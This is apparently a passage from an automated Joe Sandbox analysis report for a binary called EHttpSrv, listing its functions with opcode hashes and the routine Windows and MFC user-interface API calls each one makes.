                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 0808462cedbabd20b5884375498f88a71f44ad62655173eaff27d5a7e5eb23c8
                                                                                                                • Instruction ID: fb1f7dcdb237026851db330bbe5e016a424827fed1d1daf3b3ce9def077ef7e9
                                                                                                                • Opcode Fuzzy Hash: 0808462cedbabd20b5884375498f88a71f44ad62655173eaff27d5a7e5eb23c8
                                                                                                                • Instruction Fuzzy Hash: E391C0B16007058FC318CFAAC984A16B7E6FF80A04F45CA3DE16597B62EB39F905CB55
                                                                                                                APIs
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD2D
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD3D
                                                                                                                • #764.MFC80U(?,FEEA6C22,?,?,00000000,00000000,00000000,2047F1AF,000000FF,20462C1C,00000000,FEEA6C22,?,?,?,00000000), ref: 2040FD51
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #764
                                                                                                                • String ID:
                                                                                                                • API String ID: 441403673-0
                                                                                                                • Opcode ID: 0de0c594c89703949700b21e89ff34eb91559637fc9680df67ca391849712aa0
                                                                                                                • Instruction ID: fdd57cf25368fd12ac0ddc96e475a35c4369463dd417ef0d554794686523e5e5
                                                                                                                • Opcode Fuzzy Hash: 0de0c594c89703949700b21e89ff34eb91559637fc9680df67ca391849712aa0
                                                                                                                • Instruction Fuzzy Hash: F281AFB16006069BC718DFA4C880B6AB3A2FF44618F14CB3DE41A97B51E739F916CBC1
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Rect$Empty$Copy$#1176
                                                                                                                • String ID:
                                                                                                                • API String ID: 3074543335-0
                                                                                                                • Opcode ID: ee704bc4c26287894365f49b23ae69fd390b09f900afee5ad19f807f09f047d3
                                                                                                                • Instruction ID: 6425a5c70b000b646e18035584e1580514c672a8c1e379eec86ee53e247cd090
                                                                                                                • Opcode Fuzzy Hash: ee704bc4c26287894365f49b23ae69fd390b09f900afee5ad19f807f09f047d3
                                                                                                                • Instruction Fuzzy Hash: F45147B69093059FC304DF55C88095BF7E8FFC8664F148A2EF99993350C735E9058BA2
                                                                                                                APIs
                                                                                                                • #516.MFC80U(00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF,204708E1,?,?,?,?,?), ref: 20461202
                                                                                                                  • Part of subcall function 20421B70: #572.MFC80U(FEEA6C22,?,?,2047A038,000000FF,2042055C,?,FEEA6C22,00000000,?,00000000,2047CF55,000000FF,204132FB,00000000), ref: 20421B97
                                                                                                                • #416.MFC80U(?,?,00000004,00000002,6C4E4310,6C4E60B9,00000258,00000000,00000038,FEEA6C22,00000000,-00003AB4,?,?,2047DA78,000000FF), ref: 20461250
                                                                                                                  • Part of subcall function 2045CF80: #530.MFC80U(FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22,?,?,?,2047BED4), ref: 2045CFB1
                                                                                                                  • Part of subcall function 2045CF80: #6003.MFC80U(00000000,000000FF,FEEA6C22,00000222,000000FF,00000000,2047A55B,000000FF,2045D5C1,000001EB,00000193,000000FF,?,FEEA6C22), ref: 2045CFCD
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U(?,FEEA6C22,00000000,?,00000000,?,2047AE6F,000000FF,20472632,?), ref: 20430DFC
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E0A
                                                                                                                  • Part of subcall function 20430DC0: #310.MFC80U ref: 20430E17
                                                                                                                  • Part of subcall function 20430DC0: #557.MFC80U ref: 20430E25
                                                                                                                  • Part of subcall function 20430DC0: LoadCursorW.USER32(00000000,00007F89), ref: 20430EA4
                                                                                                                  • Part of subcall function 20430DC0: SetRectEmpty.USER32(?), ref: 20430F17
                                                                                                                • GetSystemMetrics.USER32(00000032), ref: 204612B9
                                                                                                                • GetSystemMetrics.USER32(00000031), ref: 204612BE
                                                                                                                • #1555.MFC80U(00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612C3
                                                                                                                • GetSysColor.USER32(00000005), ref: 204612CA
                                                                                                                • #1079.MFC80U(?,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 204612D8
                                                                                                                  • Part of subcall function 20427250: #1079.MFC80U(?,FEEA6C22), ref: 2042728B
                                                                                                                  • Part of subcall function 20427250: #6749.MFC80U(?,?,FEEA6C22), ref: 20427297
                                                                                                                • LoadIconW.USER32(00000000,00007F00), ref: 204612F1
                                                                                                                • #1079.MFC80U(?,000000FF,00000000,?,?,?,204810D4,000000FF,2046250A,?,-00003AB4,?,-00003AB4,?,?,00000000), ref: 20461307
                                                                                                                  • Part of subcall function 204353D0: #1079.MFC80U(?,FEEA6C22), ref: 2043540B
                                                                                                                  • Part of subcall function 204353D0: #6749.MFC80U(?,?,FEEA6C22), ref: 20435417
                                                                                                                  • Part of subcall function 204353D0: #1176.MFC80U(?,?,FEEA6C22), ref: 20435444
                                                                                                                • DestroyCursor.USER32(00000000), ref: 2046131A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #1079$#310#557#6749CursorLoadMetricsSystem$#1176#1555#416#516#530#572#6003ColorDestroyEmptyIconRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 2674052439-0
                                                                                                                • Opcode ID: 6c3ad7c6844278bfe69c59069823307c7561817536c503d72985468cfee20c1e
                                                                                                                • Instruction ID: 60706b079a469166a33850902dd76e6fd3e2fd33c4e96a0a9432f240cfdcbeb6
                                                                                                                • Opcode Fuzzy Hash: 6c3ad7c6844278bfe69c59069823307c7561817536c503d72985468cfee20c1e
                                                                                                                • Instruction Fuzzy Hash: 9B41F8702487419FD310DBB4CC45FAB7BE8AB95B48F00891CF295972D1DF786508C7A2
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 204242E9
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424303
                                                                                                                • #310.MFC80U ref: 20424331
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 2042434D
                                                                                                                • #6063.MFC80U(?), ref: 20424361
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424376
                                                                                                                • #6063.MFC80U(?), ref: 204243A3
                                                                                                                • #578.MFC80U ref: 204243B7
                                                                                                                • #6063.MFC80U(20485878), ref: 204243CA
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 204243DA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: 447ab1278b4aef991080f4fe1f8f17b9d9c23f78e00517a53a2437dfbeeb8acc
                                                                                                                • Instruction ID: 533cb2f4fa421d0b21f496b9031ee3f598897521844714d2ed33fa21755c82f0
                                                                                                                • Opcode Fuzzy Hash: 447ab1278b4aef991080f4fe1f8f17b9d9c23f78e00517a53a2437dfbeeb8acc
                                                                                                                • Instruction Fuzzy Hash: 0D31FE712082859BD734DF64CC81FDA77A8FB84714F108A2CF9996B6E1DB78AA04CB41
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424DBF
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424DD9
                                                                                                                • #310.MFC80U ref: 20424E07
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 20424E23
                                                                                                                • #6063.MFC80U(?), ref: 20424E37
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424E4C
                                                                                                                • #6063.MFC80U(?), ref: 20424E79
                                                                                                                • #578.MFC80U ref: 20424E8D
                                                                                                                • #6063.MFC80U(20485878), ref: 20424EA0
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20424EB0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: 12ec6e357741f612d219a2ba16293cc838421ccef7c7c8107f3ccfdece8e47a5
                                                                                                                • Instruction ID: 89d52809d9a14359d67d6ded87461b4adf0d1e0f6513ed5cbe667fd8efaedc71
                                                                                                                • Opcode Fuzzy Hash: 12ec6e357741f612d219a2ba16293cc838421ccef7c7c8107f3ccfdece8e47a5
                                                                                                                • Instruction Fuzzy Hash: D631D2712082859BE724DF54CC81FDA77A9FB84714F008A2DF9496B6E0DB78AA05CB51
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424F3F
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424F59
                                                                                                                • #310.MFC80U ref: 20424F87
                                                                                                                • #2311.MFC80U(?,2048587C,?), ref: 20424FA3
                                                                                                                • #6063.MFC80U(?), ref: 20424FB7
                                                                                                                • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 20424FCC
                                                                                                                • #6063.MFC80U(?), ref: 20424FF9
                                                                                                                • #578.MFC80U ref: 2042500D
                                                                                                                • #6063.MFC80U(20485878), ref: 20425020
                                                                                                                • #6063.MFC80U(20485878,20485878), ref: 20425030
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #6063$MessageSend$#2311#310#578
                                                                                                                • String ID:
                                                                                                                • API String ID: 2015696880-0
                                                                                                                • Opcode ID: 14f1f0fcab9bc9b5c70a4e5ae6aa5f785e57cda8b9646d192caa1a601cd87455
                                                                                                                • Instruction ID: 072dcf0d97579acd5ff3c96ee20a3bddb1ae043b046fb552480c49fb4609d388
                                                                                                                • Opcode Fuzzy Hash: 14f1f0fcab9bc9b5c70a4e5ae6aa5f785e57cda8b9646d192caa1a601cd87455
                                                                                                                • Instruction Fuzzy Hash: D531EE712082859FD730DF64CC91FDA77A8FB84714F008A2CF9895B6D0DB78AA04CB82
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?,FEEA6C22,?,?,?,?), ref: 20462A3F
                                                                                                                • #280.MFC80U(?,?,00000000,?,?), ref: 20462A55
                                                                                                                  • Part of subcall function 20462BC0: #2461.MFC80U(00000000,FEEA6C22,?,?,?,00000000,00000000,2047AC89,000000FF,20462A77,?,?,00000000,?,?), ref: 20462C27
                                                                                                                  • Part of subcall function 20462BC0: #578.MFC80U ref: 20462C6E
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 20462AD0
                                                                                                                • #310.MFC80U(?,00000000,?,?), ref: 20462ADE
                                                                                                                • #310.MFC80U(?,00000000,?,?), ref: 20462AF0
                                                                                                                • #4026.MFC80U(000000B7,?,00000000,?,?), ref: 20462B04
                                                                                                                • #4026.MFC80U(000000B2,?,00000000,?,?), ref: 20462B13
                                                                                                                • MessageBoxW.USER32(00000000,?,?,00000010), ref: 20462B2A
                                                                                                                • #578.MFC80U(?,00000000,?,?), ref: 20462B39
                                                                                                                • #578.MFC80U(?,00000000,?,?), ref: 20462B4B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #578$#310#4026CriticalSection$#2461#280EnterLeaveMessage
                                                                                                                • String ID:
                                                                                                                • API String ID: 2040390599-0
                                                                                                                • Opcode ID: d1b394b6afb7cd036319fbe9f8089974728a8d545961154ede2f0d74acfe459a
                                                                                                                • Instruction ID: 7f7c7edbce6c7c3cccd2b4e9f3a8d610b0c3661ec1a5eaa841b80973db8cca01
                                                                                                                • Opcode Fuzzy Hash: d1b394b6afb7cd036319fbe9f8089974728a8d545961154ede2f0d74acfe459a
                                                                                                                • Instruction Fuzzy Hash: 6A3185B5118B00AFC310DF64CC85B9BB7E8FF54B15F008E2DF55692290DB39A509CB62
                                                                                                                APIs
                                                                                                                  • Part of subcall function 204660B0: #310.MFC80U(FEEA6C22,?,?,?), ref: 2046611E
                                                                                                                  • Part of subcall function 204660B0: #310.MFC80U ref: 20466133
                                                                                                                  • Part of subcall function 204660B0: #776.MFC80U(20485878), ref: 2046614A
                                                                                                                  • Part of subcall function 204660B0: #776.MFC80U(20485878), ref: 20466159
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(00000084), ref: 20466168
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000A2,?), ref: 20466183
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 20466192
                                                                                                                  • Part of subcall function 204660B0: #899.MFC80U(204924A8), ref: 204661A1
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000EF), ref: 204661F5
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 20466204
                                                                                                                  • Part of subcall function 204660B0: #899.MFC80U( ), ref: 20466213
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000A3), ref: 20466222
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 20466231
                                                                                                                  • Part of subcall function 204660B0: #899.MFC80U(204924A8), ref: 20466240
                                                                                                                  • Part of subcall function 204660B0: #4026.MFC80U(000000EF), ref: 20466293
                                                                                                                  • Part of subcall function 204660B0: #896.MFC80U(?), ref: 204662A2
                                                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 20426E28
                                                                                                                • #2362.MFC80U(00000000,?,?,?,20426D14,?,?,?,?,00000001,?,?), ref: 20426E2B
                                                                                                                • #2788.MFC80U(00000000,?,?,?,20426D14,?,?,?,?,00000001,?,?), ref: 20426E3A
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20426E4A
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20426E7E
                                                                                                                • SendMessageW.USER32(?,0000101E,?,0000FFFF), ref: 20426E95
                                                                                                                • #2788.MFC80U(?,?,?,20426D14,?,?,?,?,00000001,?,?), ref: 20426EA0
                                                                                                                • SendMessageW.USER32(?,00001200,00000000,00000000), ref: 20426EB2
                                                                                                                • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 20426ECD
                                                                                                                • SendMessageW.USER32(?,00000030,?,00000001), ref: 20426EE5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$#4026$#896$#899$#2788#310#776$#2362
                                                                                                                • String ID:
                                                                                                                • API String ID: 1710774582-0
                                                                                                                • Opcode ID: 5296d30a1ecec7ac4013f8fc71894d4989160fccefc2a84b823980d7497a5206
                                                                                                                • Instruction ID: aa4b9502e60422c1e52898dc15779102af38bc0d2ac35246eb695f8f2cc4fd3e
                                                                                                                • Opcode Fuzzy Hash: 5296d30a1ecec7ac4013f8fc71894d4989160fccefc2a84b823980d7497a5206
                                                                                                                • Instruction Fuzzy Hash: D8319C75300A11BFE628CBA4CD91FE6B369BF48B44F018259BA089B3D1DB65FC0187A4
                                                                                                                APIs
                                                                                                                • #2651.MFC80U(00000411,00000000,2045921F,00000000), ref: 20459382
                                                                                                                • #2155.MFC80U(00000411,00000000,2045921F,00000000), ref: 20459389
                                                                                                                • #2651.MFC80U(000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593B0
                                                                                                                • #2155.MFC80U(000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593B7
                                                                                                                • #2651.MFC80U(000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593DE
                                                                                                                • #2155.MFC80U(000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 204593E5
                                                                                                                • #2651.MFC80U(00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 2045940C
                                                                                                                • #2155.MFC80U(00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 20459413
                                                                                                                • #2651.MFC80U(00000413,00000000,00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 2045943A
                                                                                                                • #2155.MFC80U(00000413,00000000,00000412,00000000,000003F0,00000000,000003EF,00000000,00000411,00000000,2045921F,00000000), ref: 20459441
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: #2155#2651
                                                                                                                • String ID:
                                                                                                                • API String ID: 2951104937-0
                                                                                                                • Opcode ID: f6fe9348ba186353032b6a423a2cf5a7871d0b0adf2b203f1672f05baf4be3ad
                                                                                                                • Instruction ID: 31b31d011d396547114fe7106fc17d19e087b2da80e5e9793571ca5a8f19b2ec
                                                                                                                • Opcode Fuzzy Hash: f6fe9348ba186353032b6a423a2cf5a7871d0b0adf2b203f1672f05baf4be3ad
                                                                                                                • Instruction Fuzzy Hash: FC21D830344640DFEB1647B48815BFE26E5EB66B45F80843CA9428F6E1DBBC9DCAC701
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: ($gfff$xXH $xXH
                                                                                                                • API String ID: 4009619764-2999701029
                                                                                                                • Opcode ID: f8be013a59c073a9477da2c2178c16b20343a47a63ff652c588ab1520a4f70e6
                                                                                                                • Instruction ID: 0ee759234e8851a67771f0f2326596c5f277068ebb508eaa214141bf9a411ff3
                                                                                                                • Opcode Fuzzy Hash: f8be013a59c073a9477da2c2178c16b20343a47a63ff652c588ab1520a4f70e6
                                                                                                                • Instruction Fuzzy Hash: BBF1B5702087018FC325CF94C580B9BBBE1AF99708F54CA5EE9598B352D735E94ACB92
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000006.00000002.2336304752.0000000020401000.00000020.00000001.01000000.00000007.sdmp, Offset: 20400000, based on PE: true
                                                                                                                • Associated: 00000006.00000002.2336245093.0000000020400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336383744.0000000020483000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336464972.00000000204A3000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336515370.00000000204A4000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336539381.00000000204A5000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                • Associated: 00000006.00000002.2336631706.00000000204A6000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_6_2_20400000_EHttpSrv.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy_s
                                                                                                                • String ID: ($(%d)$)
                                                                                                                • API String ID: 4009619764-2787113179
                                                                                                                • Opcode ID: 15abf14657b2190d1b5379c0b4c59638615587183744a76d11c00b1c5e8c27ef
                                                                                                                • Instruction ID: 8a51930926ea8aa904346e78c63c6d9904d9bb4c0cee69b43284e936653d9135
